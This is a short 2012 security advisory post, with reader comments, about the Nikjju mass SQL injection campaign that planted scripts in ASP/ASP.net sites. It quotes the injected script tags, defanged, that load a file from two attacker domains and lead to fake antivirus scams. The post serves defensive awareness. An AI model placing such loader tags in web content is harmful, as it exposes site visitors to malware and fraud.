Continued interest in Nikjju mass SQL injection campaign

Published: 2012-04-23
Last Updated: 2012-04-24 00:17:18 UTC
by Russ McRee (Version: 1)
2 comment(s)

Readers continue to write in conveying updates from sources regarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.net sites are target and scripts inserted.

Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src = hxxp://hgbyju.com/r.php <</script> and the resulting fake/rogue AV campaigns they subject victims to.

Infected site count estimations vary wildly but a quick search of the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the lihupophilupop campaign but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.

As always if you have logs to share send them our way via the contact form or any comment with any insight you want to share with readers.

Russ McRee | @holisticinfosec

 

 

Keywords:
2 comment(s)

Comments

Has anyone posted the initial SQL Injection attack payload?
@ Ryan ... 'along those lines:
- http://google.com/safebrowsing/diagnostic?site=nikjju.com
"... the last time suspicious content was found on this site was on 2012-04-24. Malicious software includes 19 trojan(s), 3 exploit(s)..."
- http://google.com/safebrowsing/diagnostic?site=hgbyju.com
"... the last time suspicious content was found on this site was on 2012-04-23. Malicious software includes 2 trojan(s)..."
- http://google.com/safebrowsing/diagnostic?site=AS:42926
"... over the past 90 days, 404 site(s),... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-04-24, and the last time suspicious content was found was on 2012-04-24..."
.

Diary Archives